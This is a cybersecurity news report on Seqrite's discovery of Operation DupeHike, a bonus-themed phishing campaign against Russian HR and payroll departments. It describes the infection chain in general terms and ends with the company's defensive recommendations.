The attack begins with a seemingly legitimate message referencing a 15 per cent performance-based bonus, a familiar and trusted topic for HR and payroll staff
Seqrite, the enterprise cybersecurity arm of Quick Heal Technologies Limited, has uncovered a sophisticated cyber-espionage campaign targeting Russian corporate organisations. The campaign, dubbed Operation DupeHike, specifically targets human resources, payroll, and internal administrative departments, exploiting routine workplace communications to gain covert access to enterprise systems.
According to Seqrite, the threat actors behind the campaign—tracked as the UNG0902 group—distributed phishing emails masquerading as official communications related to employee bonuses. The emails carried ZIP attachments titled “Bonus 2025”, containing a shortcut file designed to appear as a legitimate PDF document outlining annual bonus details. Once clicked, the file initiated a covert infection chain that allowed attackers to spy on and remotely control compromised machines.
The attack begins with a seemingly legitimate message referencing a 15 per cent performance-based bonus, a familiar and trusted topic for HR and payroll staff. When the attachment is opened, the shortcut silently executes a hidden PowerShell command, which downloads the first-stage malware from a malicious remote server. This payload then retrieves a second component disguised as a font file. The malware injects itself into legitimate processes such as Notepad or Microsoft Edge to evade detection before deploying AdaptixC2, a remote command-and-control framework used to monitor activity, exfiltrate data, and execute commands on infected systems.
Seqrite’s Advanced Persistent Threat (APT) research team at Seqrite Labs, India’s largest malware analysis facility, detected the campaign on 21 November 2025. Investigations revealed that the malicious infrastructure was hosted on servers linked to Russian hosting providers. Researchers also observed the attackers adapting their techniques in real time, initially using open network ports before shifting to encrypted communication channels to avoid detection.
Security experts warn that the campaign is particularly dangerous because it leverages trusted internal workflows and targets departments that handle sensitive financial and personal information. “Operation DupeHike demonstrates how everyday business communications can be weaponised to bypass traditional security controls,” Seqrite researchers noted.
In response, Seqrite has deployed full protection across its security portfolio, blocking all known components of the attack chain. The company has advised enterprises to reinforce employee awareness, urging staff to verify unexpected attachments—even those appearing to originate from internal departments such as HR—through official channels before opening them. Additional recommendations include enabling multi-factor authentication, restricting user privileges, and deploying security tools capable of detecting anomalous PowerShell activity and unsigned code execution.
Seqrite stated that it continues to actively monitor Operation DupeHike and is sharing updated indicators of compromise with enterprise customers and law enforcement agencies. These efforts aim to disrupt the attackers’ infrastructure and strengthen organisational defences against similar espionage-driven campaigns in the future.
